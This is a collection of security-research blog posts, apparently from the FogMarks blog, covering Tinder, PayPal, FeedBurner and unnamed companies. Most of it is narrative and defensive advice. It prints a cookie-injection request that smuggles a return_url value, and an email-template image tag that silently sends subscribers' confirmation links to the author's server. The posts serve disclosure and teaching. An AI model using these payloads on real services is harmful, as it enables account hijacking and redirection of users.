Wrong Swipe, Tinder!

Honestly, When I needed to categorize this case-study, I didn’t know what to choose. Eventually I chose the “Logic flaws” category, partly because its true and mainly because I’m too lazy to add another category to FogMarks archives.

Today’s case-study does not involve any vulnerability at all.
Yes – you heard me. No XSSes, no open redirects, no CSRFs or IDORs. Nothing. Nada.

We’ll only learn about a wrong implementation that was used by Tinder in order to integrate their users Instagram accounts on their platform.

While joking with (Ok, more like on) a friend about that the only way he’ll get a match on Tinder is if he’ll find a vulnerability for it, I have started to read about recent security vulnerabilities Tinder has suffered.
So AppSecure has found a way to take over Tinder accounts using Facebook’s Account Kit, which is awesome, and Checkmarx has found that some information on Tinder is being transferred over HTTP, again, god-knows-why.
But the vulnerability I have found most funny and interesting was the one discovered by IncludeSecurity about how Tinder users location was disclosed using Triangulation.
A fascinating article about a creative way to disclose users location using a very-accurate location parameter that was returned to any regular request to their server. Basically, Tinder handed over a vulnerability for free.

And I was amazed by the simplicity of that

After reading IncludeSecurity’s article I was amazed by how simple that was. No IDOR was needed, no complex CSRF or an XSS. The information was right there, for free, for everyone to take and abuse.

And that’s when I’ve started to think

I’ve spent a few hours researching Tinder’s website and Android app.
Really, on 2019 and especially after Facebook’s Cambridge Analytica crisis, Tinder did some damn good job securing themselves from the typical, OWASP TOP 10 vulnerabilities.

This is also the place and the time to say that on paid platforms, it is really difficult to conduct a quality security research. A lot of the actions on Tinder requires a premium account, and repeating those actions as a premium user costs even more.
Companies who want their platforms to be researched by the security community should allow full access to their platform, for free.
I know that a lot of security companies can afford funding the research, but it is not fair for small and individual young security researchers. Think about it.

I thought to myself that its over

During those few research hours I have devoted that evening after joking with (OK- on) my friend, I could not find any interesting lead to a vulnerability on Tinder. I was (and I am) so flooded in work, and I couldn’t devote anymore time for researching Tinder.
I had to message my friend that he will have to get himself that auto-swiper from AliExpress in hope for a match.

And then IncludeSecurity’s article has popped in my head. I thought to myself: “If Tinder’s logic on that case was not very privacy-oriented, what other sensitive information do they pass ‘out in the wild’, while it should have been kept private?”

3rd party integrations is the name of the game

Tinder, like many other social platforms, has several integrations with some very popular companies and platforms – Spotify, Facebook and even with some universities.

While simply going through all the responses that came back from regular Android API calls of the application, I have noticed that when a user connects his Instagram account with Tinder, his Instagram photos are being showed on his profile page.

Yes, 12:55 AM is considered my evening.

After tapping the ‘Share X’s Profile’ button, I’ve noticed that a unique share-identifier has been generated to that profile, which looked like this:

When I have accessed this URL from the web version of Tinder, nothing happend – I was redirected to https://tinder.com

But when I have accessed it from an Android phone’s browser, the Tinder app was launched and a GET request to https://api.gotinder.com/user/share/~<UNIQUE_SHARE_ID> was initiated.
The response to that request contained a lot of details about the user, including his/her Instagram username.


It is the first time in the history of my case-studies that I don’t have something smart to say or teach. This vulnerability (which has been patched, of course) and the one IncludeSecurity found could have been easily prevented by simply going through the returned data of all the supported API calls, and making sure that non-private information is being handed over.

In the end, I believe that a QA team has gone through the returned data of the API calls, but for the wrong purposes – they probably just made sure that the returned data is exactly what the front-end UI expects.

I think that the most important lesson here is that the QA stage before version releases is not enough, as large and comprehensive it may be.
Having a Red-team is crucial for the safety of the about-to-be-released product and its users.


Keep Your Friends Close and Your Domains Closer!

Stay updated on FogMarks!

Happy 2019!
Hopefully you guys have survived new year’s eve and didn’t ignore the alarm clock and wake up 2 hours late like someone I know did..!

So, after my sincere, heartbreaking apology last year (i.e. two days ago), as promised- here is the case study. Unfortunately, the involved company did not allow me to disclose its name, due to the possibility that the vulnerability we are going to discuss about still exists in some other variations or platforms of it.

So what is this all about?

To start the new year with the right mood, today’s case study will present a different kind of vulnerability. A so-called “logic flaw” that can happen to you as well, with a bit of unawareness to it.

So a certain company had a middle-age crisis. Some fundamental, non-tech errors has been made, the stock went for a 40-meter dive at the Red Sea, and 30% of the stuff have been fired. The CTO was among them.
As bummed as it may sound, this situation is not new. A lot of tech companies, even solid and super-rich ones suffer from it. Once money and non-tech stock holders are involved, things can get pretty rough and actions are being taken too quickly, sometimes.

That company’s main business is providing frontend Javascript rich text editing services: their main product is a beautiful WYSIWYG editor which is serving dozens of popular platforms and websites.

No, not another WYSIWYG XSS!

The thing is, that their WYSIWYG editor was great. It didn’t had known security vulnerabilities, it functioned terrifically and was a great success.
To distribute it to their customers, they had offered them to install it via npm, or to reference it directly via their official CDN (i.e. place <script src=”https://xxxx.yyy/WYSIWYG.js> and .css in the source code).

If you’ve read my past posts regarding the latter solution- asking (or forcing) the clients to directly reference to your CDN, so they could have the latests patched release every time, you will think that there is nothing wrong with that.
Well, here is something I didn’t think of when proposing you to be referenced directly from your clients: you may loose your domain!


Indeed. Remember that I said that the CTO was fired during the middle-age crisis? Well, one of his responsibilities was to renew the product’s domain (which was different from their main logic and their UI – for his credit!).
After he and some other dev stuff got fired, the board has such a mess and they have completely forgot that the globe is still spinning and that bills should be payed..

When the fatal date arrived (on Sunday, of course)- everyone was asleep. Except from a domain-troll bot which had immediately acquired the domain.


Actually, the title is misleading. Badly.
When I was approached to with this problem (36 hours after the domain loss and only when the customers have reported it to the help team), I really didn’t had anything smart to say here.
The domain was bought legally by another company who saw it was expired. What can be done? Sue that China-Taiwan-New Mexico-Arab Emirates-Thailand legit company? Hack into their systems and liberate the stolen domain? Nothing can be done fast enough to minimize the damage to the customers and to the company, except starting a negotiation with the domain acquirer and praying for god (or whatever).


The crisis has ended ironically near the last day of Hanukah,  With the company buying back the domain for a very, very overpriced price. Well, even Trolls gotta eat.

So why did I chose to open 2019 with sharing you this type of a case-study? Because security vulnerabilities are endless, always was and always will. But all of them are solve-able. Some can be solved easy, some can only be solved after 3-gallons of coffee and 1 liter of the dev team’s tears, but eventually software issues are solve-able.
This was not a software issue. This was the loss of a very expensive and important asset, which resulted in a massive money loss (and a few customers, who is now doubting the company’s stability).
So what can be done to prevent these types of “vulnerabilities”?

  1. Don’t fire the CTO. Glue him to his chair if you have to. I’m kidding. Implement the approach in your company that when a member leaves – wether its the CTO or a QA personnel – he writes down his responsibilities and passes them to his successor. Like-da?
  2. For this specific domain-loss issue: For god’s sake – Buy domain names and similar assets for 10+ years! You are a f*****g commercial company and it costs nothing to you.
  3. Always monitor your services, internal and external ones. The clients should never be the one who detects the issue in your platform or service. Some 3rd party keep-alive functionality will do the trick.

2018 was a great, super-educating year. I wish 2019 will be even more educating and even more challenging.
Happy New Year!

Image result for 2019 fireworks icon

Keep Your Friends Close and Your Domains Closer! [Intro]

Stay updated on FogMarks. More to come soon. Pinky-swear.

Ok ok, I know.

(TL;DR;- Me apologising for not being around this year. You can skip right ahead to the case-study)

No post has been made since January 2018. Not even one XSS has been triggered, not even one byte of data has been leaked from a DB and not even one line of arbitrary code has been remotely executed. I can continue with that all night.
But listen, before the beating, hear me out first.

FogMarks has started as a self-test. Somewhere around November 2015, I worked as a junior security researcher in some company. That place had terrible work manners: “Juniors are dumb, so they should not be writing code to the production products (i.e. add features, involve in development), nor conduct security research. They should first sit down and look at others work”. Honestly, I was never good at looking at others and doing nothing.
So, I offered my help and expressed my opinion in a lot of issues and active researches that were going on. And well, they didn’t like that.
They have complained about me to the “superiors” and I was (rudely) asked to pretty much mind some other boring-junior-business.

At that time I was fascinated about finding a way to disable the AdBlock chrome extension remotely (yes, not the nicest thing to do, I know:). I started to conduct my own private research at the evenings. I was coming back from work straight to my real work. Time passed and indeed I have found a way to crash AdBlock (on Chrome 47- Gosh I’m old!). But then, during my research that was involving a lot of digging, T&E and tears, I have exposed to how insecure modern platforms are. I’ve read lots of badly-implemented source code in some very sensitive and widely-used open-source products, and I was shocked at some very half-an-hour-to-find severe security vulnerability that were (and still are, and always will be) in the world’s most popular platforms.
I have decided to devote my time to help solve those issues, conduct white-hat security research and most importantly- share my experiences, thoughts, ideas and some of my work methods and ideologies – here.

This is the story of how FogMarks was born. By the way, if we are completely honest here, the name FogMarks popped-up in my head only around February 2016, while driving to the cinema during one of Israel’s heaviest fogs ever. The road had blinking warning marks on it, and at some point I told my girlfriend that I only see marks in the fog and I just follow them to safety. Fog Marks.

So what the hell happened in 2018?!

After 2 years of researching, I’ve came across some very interesting development opportunity. Not something crazy, but some very helpful set of utils that can ease the life of a lot of people.
The thing is that developing it took a lot of time and a lot of planning. So I wasn’t active at all since January.

So you missed and came back crawling.. ha?!

Yeah. You got it. Security researching is one of the funnest things I’ve done in my career life. I had to put it on some hold so I could focus on that other project. But this year, I hope that project has been staebliezied- so I’m back on baby!

Keep Your Friends Close and Your Domains Closer!

Edit [30/12/2018]: This part will be published on January 1st, as I hope that company will allow me to disclose its name by then.

Stay tuned!

Edit [01/01/2019]: Post has been published.

DoS: Back From The Dead?

Stay updated on FogMarks

Happy 2018!

January is the perfect after-holidays time to point out our goals for the next year. And to lose some weight (because of the holidays), of course!
FogMarks always aims to write the most interesting case-studies about the latest “hot” vulnerabilities, and 2018 is going to be super-exciting!

So, finally after a long break here we are again discussing a vulnerability that many though was dead: the Denial of Service attack.
I’ve heard a lot of statements in the sec community regarding DoS attacks and vulnerabilities. Most of them addressed DoS as “an attack of the past”, as a vulnerability that cannot affect the server side anymore, thanks to companies such as Cloudflare, Nexusguard and other load-balancing service providers.

As a result, a lot of bug bounty programs aren’t accepting DoS vulnerability submissions, and sometimes even forbid the researcher from testing, in fear of an affect on the system’s stability and user experience. And their right, sort of.

But- who said that a DoS attack has to be on the server? It takes two to tango – if the server is now “protected” against DoS attacks (by an anti-DoS/DDoS service), who is protecting the user?

Let me elaborate on that: Companies are too busy preventing DoS attacks on their servers, that they are forgetting that DoS attacks are possible against users as well. A Denial of Service attack, to my definition, is any attack which prevents a user from accessing a resource or a service from the server. This can be done by directly attacking the server – like trying to make him “shutdown” from over-traffic – or by directly attacking the users.

Actually, attacking the users is the more easy way to do it. In addition, in a lot of cases the company won’t even know that the user was attacked until the user will contact the company and say “Hey, I cannot access X”.

You all know what I’m about to say now. Which type of vulnerability can cause a DoS attack super fast to a specific user? An XSS of course!

Sending or planting an XSS payload which disrupts a certain service onto specific user/users causes a severe denial of service/resource to that user or users. This payload can be a simple redirection outside of the site, or even “document.write(”);” that is simply printing a white page or a misleading page.

A certain very known commercial company, which hasn’t allowed us to mention it’s name yet suffered from that exact attack.
When I first started to research their main product, I was told not to DoS or DDoS their servers, “because we have an anti-DDoS mechanisms that are preventing that, and we think DoS attack belongs to the past”. Of course that DoS from a different angle was the next thing I have done on their product 🙂

I come to understand that an XSS payload can be sent directly to a specific user or to a users group. That XSS was “universal” – it was executing from any page of the site, because of the messaging feature that appeared in any page. I planted an XSS payload which simply echoed a mock “404 Not Found” page onto the page. To prove that this issue was indeed severe, me and the head of their security response team have test the attack on the production site, against one of the developers. He response (“WTF? What happened to the site?”) was hilarious.

Although most of the modern servers are now vulnerable to DoS and DDoS attacks thanks to smart load balancing and malicious requests blocking services, the user is still out there – unarmed and unprotected. You should always treat any type of attack that can prevent an action from being fulfilled as a major security issue, regardless of the type of the vulnerability.

Happy & Successful 2018!

Phishing++ – Chapter II

Stay tuned on FogMarks

Hi! Long-time-no-case-studied.
I know, I know, this chapter was supposed to be released two weeks ago, but we waited for PayPal‘s official permission to disclose this two vulnerabilities before even starting to write the case-study (why? Read our about page).

So, finally – PayPal kindly allowed us to disclose two HTMLi/XSS vulnerabilities they had in the last summer, and that’s perfect because now we can show you a real life scenario that actually happened.
Before reading this, please make sure you fully read and understand the previous chapter. This is vital for this final chapter – its like you cannot start watching Breaking Bad from the second season (Although I know a guy who did it, because he was lazy downloading the first season. Weirdo.)

In the last chapter we talked about what companies can do to prevent 3rd party malicious phishing websites from using their HTML entities such as images, JS scripts and CSS style-sheets.
Today we are going to talk about the most dangerous & complicated Phishing attacks – phishing attacks that occur on the official website.

In the past, Phishing was super-easy. New internet users didn’t understand the importance or even the existence of an official domain. They were used to access their desired websites by a bookmark, by a mail someone sent them and later on – by Google.
Later on, Phishing became less easy. Companies started to warn their users from accessing their site from wrong sources like email messages or forum links. They made their users aware of the domain part of the browser’s window. And indeed, most users have adapted to these security precautions and now double-check the domain their viewing before making any action.

But no one prepared the companies for this new stage of Phishing attacks: Phishing on the official companies websites!Imagine that a malicious deceptive page is being inserted to the website under the official company domain.
A malicious file doesn’t have to be even uploaded – existing pages by the company can be altered by attackers – using XSSes, HTML Injections, Headers Injections or Parameter injections – and malicious content will be displayed.

Actually, there only one TV series about “Cyber” security I appreciate: CSI:Cyber. They presented this exact case of HTML Injection in their 10th episode of the first season.

Ok, now that we learned how to swim – let’s jump to the middle of the ocean.
PayPal suffered from two XSS/HTML Injection vulnerabilities which allowed 3rd-party malicious content to be added to official PayPal pages under the official ‘www.paypal.com’ domain.

This allowed us to create some very nice Phishing templates, such as:

In addition, we were able to actually create a <form> inside a page, which allowed us to send the credit card data of victims to a 3rd party websites. Unfortunately, this demo was not allowed to be published.

I even created an online ‘Web Gun’ Content Spoofer which can inject HTML entities directly to a vulnerable page:

The fix
Actually, there is no easy fix. Haunting down vulnerabilities and paying attention to payloads that are being injected to the website pages – via GET/POST requests or via SQL queries (in case of a permanent XSS) is pretty much the best way to handle this threat.
XSS Auditors – like presented in PayPal’s case – simply don’t work.

Writing this 2-chapters sequel was very fun. Expect similar case-studies in the near future.
But till then,

Phishing++ – Chapter I

Hi! What’s going on?

Today’s case-study is a bit different, and it is a 2-sequel article. The next chapter will be published as soon as a certain company will allow us to publicly disclose two vulnerabilities they had.

Today I’m not gonna talk about a regular attack – this whole chapter is about Phishing.

So Phishing – why the hell are we talking about it? “Its not a security issue”

I’ve heard dozens of statements about how phishing is not an actual vulnerability, and many public companies think so. Its fair to say that they are quite right – a 3rd party website that is pretending to be the real one is not an actual vulnerability on the real site.

But does that mean that the company should not care at all? No. Some companies (like PayPal, Facebook, etc.) are reporting phishing attacks to anti-virus companies, who block the user from entering the malicious site. That’s fair, but it’s not enough. There is not enough man power or even “internet crawling power” to fully protect users from malicious phishing websites. Actually, most companies does not care that there are malicious pretenders out there. In their ToS agreement, some of them rudely claim that the customer is fully responsible for any data/money lost/theft if he falls victim to a phishing attack.

But I say that there is more to do other than looking at the sky and counting birds. A small research I have conducted on some phishing websites which pretended to be PayPal and Facebook led me to write this chapter of this case-study, instead of fully presenting the vulnerability as I always do.

I realized that in order to perfect their visual appearance, phishing websites use actual photos, CSS and JavaScript elements from the original one. This means that the PayPal-like phishing site “https://xxxx.com” has image and JavaScript tags which fetch images and scripts from the original PayPal site! (or https://paypalobjects.com, to be accurate.).

Why are they doing so? Why should that matter?
They are doing so because they want the experience of the website to be exactly like the original. And how can that be achieved? Simple! By using the same images and JavaScript scripts.
Most of those websites has only one page – either Login (to steal the login credentials) or Pay (to steal the visa card credentials). The actual source code is a lot like the original one, accept minor changes to the way the data is being sent.
That’s matter because once a company knows that a malicious website is using it’s entities – it can stop that!

A simple fix that the company can do “tomorrow morning” is to disallow fetching of JavaScript scripts, images and CSS style sheets by an unauthorized 3rd-party website. This way, phishing websites will have to work harder in order to get the same experience and appearance of the original website.

It’s never a 100%
Even if websites will disallow unauthorized fetching of entities, phishing sites will always be able to store the images, CSS and JavaScript “on their own”. It’s a cat-mouse race that probably far from an end.
But its another step forward. Making the life of phishing sites maker harder should be a life-goal of every company and security researcher.

Heads up for the next chapter! Cheers.

Cookies And Scream

Whoa, What a summer!
I know, we haven’t been active in the last month – blame that on the heat and on my addiction to the sea. I should really get a swimming pool.

OK, enough talking! The summer is almost over and now its time to step on the gas pedal full time.
Today’s case-study also discusses proper user-supplied input handling, but with a twist.

I feel like I talked enough about the importance of properly handling and sanitizing user supplied input. There are tons of XSS and HTML filters out there, and they are doing pretty good job.
But user input doesn’t always being shown onto the page or inserted into the DB. In some cases, many popular web platforms stores it in a cookie.

PayPal, for example, inserts the value of the GET parameter ‘cmd’ as the value of the cookie ‘navcmd’:

GET https://cms.paypal.com/cgi-bin/marketingweb?cmd=test HTTP/1.1
Host: cms.paypal.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,he;q=0.6

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache, no-store
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Wed, 30 Aug 2017 21:15:04 GMT
Content-Length: 8764
Connection: keep-alive
Set-Cookie: navcmd=test; domain=.paypal.com; path=/; Secure; HttpOnly

There’s no evil with storing user supplied input in a cookie, and its actually a good practice sometimes, if you don’t want to use sessions or other similar mechanism.
A very common use for user supplied input in a cookie is storing a redirect URL: Sometimes you want to remember from which page the user came from, or to where redirect him at the end of the process. Keep that in mind.
Before I’ll get to the vulnerability itself, I’ll tease you a bit and say that this time, the malicious payload bypassed the XSS & HTML sanitation mechanism.

A very known financing company had this exact cookie functionality. User input from some GET parameters has been stored in some cookies. For example, the value of the GET parameter ‘redirect_url’ was stored in the cookie ‘return_url’. This cookie was then used by dozens of other pages in order to redirect users to a “thank you” page. An open redirect attack on that parameter was not possible, because the value of the GET parameter ‘redirect_url’ has been checked & verified before allowing it to be added as a cookie.

At first glance – everything looks fine. I’ve read the JS code that was responsible for sanitizing the input and determined that its doing its job pretty well – no HTML entities or other “bad” characters (like ‘, “) were able to be reflected – thanks to the encodeURI function that was being used intensively.

And then it hit me. encodeURI doesn’t encode characters like ; or = – The exact characters that are being used when setting a cookie!
So, a GET request to the vulnerable URL, without the ‘return_url’ GET parameter (to prevent collisions):

GET https://vulnsite.com/action?vulnGETParameter=xyz;return_url=https://fogmarks.com HTTP/1.1

HTTP/1.1 200 OK
Set-Cookie: vulnGETParameter=xyz;return_url=https://fogmarks.com; domain=.vulnsite.com; path=/; Secure; HttpOnly

The result of this in some cases was an open redirect in pages that relied on the fact the value of ‘return_url’ will always be safe.

When you decide to store user input in a cookie, you must know how to treat it well, and you must remember to dispose it when the time is right. In this case, using the same sanitation mechanism for input that will be shown onto the page and input that will be inserted to a cookie is wrong.
The patch here was simple: instead of using encodeURIencodeURIComponent() was used.

Happy & chilled autumn folks!

Doppelgangers Week

Hey-O! How’s it going?

Today’s case-study is about a subject we’ve never discussed before (or maybe a little bit) – proper & secure Database management.

So Databases, we all use them. SQL-based or not,  we need some sort of non-volatile mechanism to save our data.
Whether you like it or not, currently, the SQL-based databases (MySQL, MS-SQL etc.) are still the most used databases in the world, and a lot of companies use them as their main storage mechanism. Long live the Structured Query Language! (no;-)

So- properly managing & controlling the database. I know, you’re thinking: “What the hell does this guy want? Its so obvious to manage and control my DB!”. Shut up and read!
First, let’s talk business: I have seen “more than a few” companies that don’t know how to control their own database(s):
a. The database connection string is known to a lot of other mechanism.
b. There is only one user – the root one – and every mechanism use it.
c. Even if there are a few users – one for each mechanism – all of the users have basically the same permissions set.
d. There are no DB backups. EVER!
e. And more horrifying things that I won’t say, because there might be children reading these lines, and it’s bed time.

The database is one of the most holy mechanisms in the application. It doesn’t matter the type of data it stores – it should be well treated.

A well-treated DB (Database)
First, let’s set things straight – “well-treated DB” does not mean a “suffering from obesity DB”. This case-study will not discuss the type of DB collection that your application should use, rules to not flood your DB and the advantages and disadvantages of using an SQL-based DB.
This article will highlight the risks of improperly handling your DB by showing you a real life example, and will supply some fundamental guidelines to keep your application more safe.

A very known Real Estate company, which it’s name we cannot disclose (and we respect their decision) suffered from some of the horrifying cases I described above: Their connection string was known to a lot of mechanisms, they had only one, fully-privileged root user and they didn’t have automatically periodically backups.

They had a main production DB which had a few tables. The main table was ‘user’ – a table which, among other stuff, held user Id, username (which was an email address) and salted password.

The email address was the users main identifier, and it could have been changed/replaced by the user. The change took place immediately, and until the user entered a confirmation link in the new email address he supplied, he wasn’t able to execute any “massive” action on the application, accept for information fetches. Which means – the user was still able to see his own object and data on the application.

So far so good- although the lack of awareness to the mentioned horrors (same CS, root user, no backups) – no SQL injection was possible, no CSRF was found, and the code was pretty much secured. Accept for one thing – It was not possible to supply an already existing email address when signing up, but it was possible to change email address to an existing one.

“So what?”, “What is the impact”, you say
Well, first I also thought: Meh, not much. But I was wrong. Very wrong.
When the DB had 2 rows with the same email address in the main table- it went crazy. Actions and data which was relevant to one email was relevant and visible to the other!

For example, the query to view all private assets which are related to that email looked very simple, like:

SELECT * FROM Assests WHERE EmailAddress = ‘<EMAIL_ADDRESS>’;

And resulted with private assets related to that TWO emails. An attacker could have changed his email to a victim’s one and then leak highly valued, private data.

When the company & us examined the code, we understood that another mechanism was responsible for changing the email address – and there were no existing checks at all. A simple mistake which could have led to a major disaster

So… give me your f-ing guidelines already!
This issue could have been easily prevented. The company agreed that this is a simple logic flaw. Maybe the programmer was tired. And the code reviewer(s). And the QA. I don’t know…
0. So the first guideline is to always drink coffee while writing such sensitive features. Or coke. Definitely not beer. Don’t ask.
1. The second one is to always have one and only DB managing mechanism. Write a simple, public & shared DB wrapping mechanism that every other mechanism in your application will have access to. Don’t have a DB util to each feature, and certainly don’t allow non-related mechanisms to supply you the SQL query.
2. Don’t be naive. Check each given user data for malicious characters. Integrate your existing sanitation engine to your DB managing mechanism.
3. If you can – never delete something from the DB. Remember: restoring is harder than resetting. It is best to simply have an indication that a row is ‘inactive’ instead of deleting it from your DB. Don’t be cheap on space.
4. This one is pretty obvious: Don’t allow non-certified users to execute requests that influence the DB.
5. Have a periodically, 3rd party service that backs up your DB every x hours. Provide this service a different user with only SELECT privileges.

Those 5 “gold” guidelines (and #5 is the most important, to my opinion) will assure you won’t have a heart attack when things will go wrong.
We’ll talk about having a Defibrillator later.


Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry Primal, was that we have been very busy exploring new grounds in the web & application research. Today we would like to present one of those new areas.

Our research in the past couple of months did not focused on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new & exciting. You can call us Columbus. But please don’t.

So, “out-of-the-box” vulnerabilities. What are they? Well, in my definition, those are vulnerabilities that don’t have a known definition.
Today’s case-study is exactly one of those exciting new findings. This time, the research was not a company-specific. It was a method-specific.

Method-specific research?
Its simple. I wasn’t looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are being done in the top-used communication methods.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol, and the way it is being used around the web.

In short, the SMTP protocol is being widely used by millions of web applications to send email messages to the clients. This protocol is very convenient and easy to use, and many companies have implemented it in their everyday use: swap messages between employees, communicate with customers (notifications, etc.) and many more. But the most common use right now for SMTP (or simply for ‘sending mail’) is to verify users accounts.

One of SMTP features is that it allows sending stylish, pretty HTML messages. Remember that.

When users register to a certain web application, they immediately get an email which requires them to approve or to verify themselves, as a proof that this email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. This email contains a link with an access token that validates that the email is indeed being used by the client. This email’s content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: ‘$(confirmlink)

“SMTP allows sending HTML, so lets send XSSs to users and party hard” – Not really. Although HTML is being supported by SMTP, including malicious JavaScript tags, the web application’s XSS audit/sanitizer is responsible for curing the HTML arrived in the SMTP, before parsing it and executing it to the viewer.

And that’s where I started to think: How can I hijack the verification link that users receive to their mail, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I can include a sanitized, non-malicious HTML code, but I couldn’t execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)”>Click here!!!</a>

And it worked. The users received an email with a non-malicious HTML code. When they clicked it, the confirmation link was being logged in a server of mine.

I though: “Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event? Well, the answer is incredible. I’ll use the one allowed tag that is being loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src=”https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)” />

I was able to send the confirmation link to my server, without any user interaction. I abused HTML’s automatic image loading mechanism, and abused the fact the sanitized HTML could be sent over SMTP.

Google hasn’t accepted this submission. They said, and they are totally right, that the SMTP mail is being sent by FeedBurner with a content type: text/plain header, and therefore, it is the email provider’s fault that it is ignores this flag and still parses the HTML, although it is being told not to.

But still, this case-study was presented to you in order to see how everyday, “innocent & totally safe” features can be used to cause great harm.

Tokens Tokening

Our case-study today will set some ground rules for a new Anti-CSRF attitude that I was working on for the past few months. This new attitude, or, for the sake of correctness – mechanism, basically catalogs CSRF tokens. Don’t freak out! You’ll understand that in no time.

First, I must say that I am probably not the first one to think of this attitude. During some researches I came across the same principals of the tokens cataloging method I am about to show you.

So, What the hell is tokens cataloging you ask? It’s simple. This is an Anti-CSRF security attitude (/policy/agreement/arrangement – call it what you want) where CSRF tokens are being separated to different actions categories. This means that there will be a certain token type for input actions, such as editing a certain field or inserting new data, and there will be a different type of tokens for output actions, such as fetching sensitive information from the server, or requesting a certain private resource. These two main token groups will now lead our way to security perfectness. Whenever a user will be supplied with a form to fill, he will also be supplied with an input action token – a one-time, about-to-expire token which will only be valid to this specific session user, and will expire x minutes after its creation time. This input token will then be related to this specific form tokens family, and will only be valid in actions of this family-type.

Now, after explaining the “hard, upper layer”, let’s get down with some examples:

Let’s say we have a very simple & lite web application which allows users to:
a. Insert new posts to a certain forum.
b. Get the name of each post creator & the date of the creation of the post.

Ok, cool. We are allowing two actions: an input one (a), and an output one (b). This means we’ll use two token-families: one for inserting new posts, and the other for getting information about a certain post. We’ll simply generate a unique token for each of these actions, and supply it to the user.

But how are we going to validate the tokens?
This is the tricky part. Saving tokens in the database is a total waste of space, unless they are needed for a long time. Since our new attitude separates the tokens to different families, we also use different types of tokens – some tokens should only be integers (long, of course), some should only be characters, and some should be both. When there is no need to save the token for further action, the token should not be kept in a certain data collection, and it should be generated specifically for each user.
What does it mean? That we can derive tokens from the session user’s details which we already have – we can use his session cookie, we can use his username (obfuscated, of course) and we can mix some factors in order to generate the token in a unique way, which can only be ‘understood’ by our own logic later in the token validation process. No more creating a random 32-chars long token with no meaning that could be used trillion times. Each action should have its own unique token.

“This is so frustrating and unnecessary, why should I do it?”
If you don’t care about resubmitting of forms, that’s OK. But what about anti brute forcing, or even anti-DoSing? Remember that each action that inserts or fetches data from the DB costs you in space and resources. If you don’t have the right anti brute forcing or anti DoSing mechanism in place, you will go down.
By validating that each action was originally intended to happen, you will save unnecessary connections to the DB.

If implementing this attitude costs you too much, simply implement some of the ideas the were presented here. Remember that using the same type of token to allow different actions may cause you harm & damage. If you don’t want to generate a token for each user’s unique action, at least generate a token for each user’s “general” action, like output and input actions.